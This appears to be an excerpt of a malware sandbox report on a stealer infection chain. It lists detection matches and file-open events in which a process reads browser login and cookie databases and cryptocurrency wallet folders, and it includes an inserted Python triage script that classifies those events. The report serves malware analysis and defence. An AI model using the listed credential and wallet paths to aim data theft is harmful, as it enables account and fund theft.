Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\penis[1].exe, type: DROPPED
Source: RegAsm.exe, 00000021.00000002.2744975325.000000000331C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: %appdata%\Electrum\walletsLR
Source: RegAsm.exe, 00000021.00000002.2744975325.000000000331C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: q5C:\Users\user\AppData\Roaming\Electrum\wallets\*
Source: RegAsm.exe, 00000021.00000002.2744975325.000000000331C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: q-cjelfplplebdjjenllpjcblmjkfcffne|JaxxxLiberty
Source: RegAsm.exe, 00000021.00000002.2744975325.000000000331C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: %appdata%\Exodus\exodus.walletLR
Source: RegAsm.exe, 00000021.00000002.2744975325.000000000331C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: %appdata%\Ethereum\walletsLR
Source: RegAsm.exe, 00000021.00000002.2744975325.000000000331C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: %appdata%\Exodus\exodus.walletLR
Source: RegAsm.exe, 00000021.00000002.2744975325.000000000331C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: qdC:\Users\user\AppData\Roaming\Binance
Source: RegAsm.exe, 00000021.00000002.2744975325.000000000331C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: %appdata%\Ethereum\walletsLR
Source: RegAsm.exe, 00000021.00000002.2744975325.000000000331C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: q&%localappdata%\Coinomi\Coinomi\walletsLR
Source: RegAsm.exe, 00000021.00000002.2744975325.000000000331C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: q9C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
Source: 66ed86be077bb_12.exe.27.dr String found in binary or memory: set_UseMachineKeyStore
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\atomic\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Guarda\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
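The "File opened", "WMI Queries" and registry lines above are what an analyst keys on when deciding which process in a multi-payload chain is the stealer. The following Python is an added triage example, not part of this report or of the sandbox's own tooling: it parses lines in exactly this report's format and groups each source process's targets into browser credential stores, cryptocurrency wallet directories, security-product enumeration via ROOT\SecurityCenter / ROOT\SecurityCenter2, and host fingerprinting (MachineGuid, CentralProcessor, volume information). The sample lines are constructed to mirror entries from this section; the store and wallet name lists are an assumption drawn from the paths this report shows plus the common Firefox credential files, and would need extending for other targets.

```python
import re
from collections import defaultdict

# Constructed sample lines in the shape of the report entries above (not the full report).
# Paths ending in a backslash are kept verbatim, as the report prints directory targets that way.
SAMPLE_LINES = r"""
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\1000015002\b74664dd7e.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\Desktop\notes.txt
"""

# One report line: "Source: <process> <event kind>: <target>", optionally followed by the
# "Jump to behavior" link text that the HTML export leaves behind.
LINE_RE = re.compile(
    r"^Source: (?P<proc>\S+) "
    r"(?P<kind>File opened|WMI Queries|Key value queried|Registry key value queried|Queries volume information): "
    r"(?P<target>.*?)(?: Jump to behavior)?$"
)

# Assumed lists: file names of browser credential/cookie stores and wallet directory names seen
# in this report (plus Firefox's logins.json / key4.db). Extend for other targets.
BROWSER_STORES = {"login data", "web data", "cookies", "extension cookies",
                  "cookies.sqlite", "logins.json", "key4.db"}
WALLET_DIRS = {"electrum", "exodus", "ethereum", "coinomi", "binance", "guarda",
               "atomic", "com.liberty.jaxx"}
SECURITY_CLASSES = {"AntivirusProduct", "AntiSpyWareProduct", "FirewallProduct"}
FINGERPRINT_MARKERS = ("MachineGuid", "CentralProcessor", "VolumeInformation")


def classify(kind, target):
    """Return the category a single event belongs to."""
    if kind == "WMI Queries":
        if "SecurityCenter" in target and target.split()[-1] in SECURITY_CLASSES:
            return "security_product_enum"
        return "other"
    if any(marker in target for marker in FINGERPRINT_MARKERS):
        return "host_fingerprint"
    if kind == "File opened":
        parts = [p for p in target.split("\\") if p]
        if parts and parts[-1].lower() in BROWSER_STORES:
            return "browser_credentials"
        if any(p.lower() in WALLET_DIRS for p in parts):
            return "crypto_wallet"
    return "other"


def triage(lines):
    """Map each source process to {category: sorted, de-duplicated targets}."""
    seen = defaultdict(lambda: defaultdict(set))
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # Yara matches, memory strings etc. are not handled here
        seen[m["proc"]][classify(m["kind"], m["target"])].add(m["target"])
    return {proc: {cat: sorted(t) for cat, t in cats.items()} for proc, cats in seen.items()}


def stealer_indicators(triaged):
    """Processes that both enumerate security products and touch credential or wallet stores."""
    flagged = [proc for proc, cats in triaged.items()
               if ("browser_credentials" in cats or "crypto_wallet" in cats)
               and "security_product_enum" in cats]
    return sorted(flagged)


if __name__ == "__main__":
    result = triage(SAMPLE_LINES.splitlines())
    for proc, cats in result.items():
        print(proc)
        for cat, targets in sorted(cats.items()):
            print(f"  {cat}: {len(targets)}")
    print("stealer-like:", stealer_indicators(result))
```

On the constructed sample, RegAsm.exe is the only process that both queries SecurityCenter2 and opens browser and wallet stores, which matches the page's attribution of the stealer payload to the RegAsm.exe host; the loaders (b74664dd7e.exe, skotes.exe) only fingerprint the host. Directory targets that end in a backslash are matched on their path components, so the Exodus and Coinomi entries classify correctly even though they name no file.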
Source: 6dbb7bdf47.exe Binary or memory string: WIN_81
Source: 6dbb7bdf47.exe Binary or memory string: WIN_XP
Source: 6dbb7bdf47.exe, 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmp Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: 6dbb7bdf47.exe Binary or memory string: WIN_XPe
Source: 6dbb7bdf47.exe Binary or memory string: WIN_VISTA
Source: 6dbb7bdf47.exe Binary or memory string: WIN_7
Source: 6dbb7bdf47.exe Binary or memory string: WIN_8
Source: Yara match File source: 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.2744975325.000000000331C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 2516, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\penis[1].exe, type: DROPPED
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 31.2.gold.exe.3775570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.gold.exe.3775570.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001F.00000002.2104172556.0000000003775000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.2737248313.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: gold.exe PID: 4516, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 2516, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\newbundle2[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe, type: DROPPED
Source: Yara match File source: 15.2.3ec4738210.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.2.3ec4738210.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.b74664dd7e.exe.540000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.b74664dd7e.exe.540000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.3ec4738210.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.b74664dd7e.exe.540000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000003.1600953137.0000000004AB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2669801518.0000000000541000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.2280696293.0000000000201000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2352900147.0000000000D88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2350817392.0000000000201000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.1971865363.0000000000201000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.2284052492.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2586371888.00000000012EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1644238090.0000000004F00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.1976198696.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000003.1756168232.0000000004C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2583706589.0000000000541000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.2790303131.0000000000541000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.1942187223.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.2792862379.000000000122B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.1841769125.0000000004A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2673207759.0000000000FAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.2010739525.0000000004E60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2583706589.00000000005DA000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.2280696293.000000000029A000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.1971865363.000000000029A000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 3ec4738210.exe PID: 7672, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: b74664dd7e.exe PID: 7812, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 3ec4738210.exe PID: 8032, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: b74664dd7e.exe PID: 6220, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 3ec4738210.exe PID: 1964, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: b74664dd7e.exe PID: 4500, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\stealc_default2[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\penis[1].exe, type: DROPPED
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E71204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, 17_2_00E71204
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E71806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 17_2_00E71806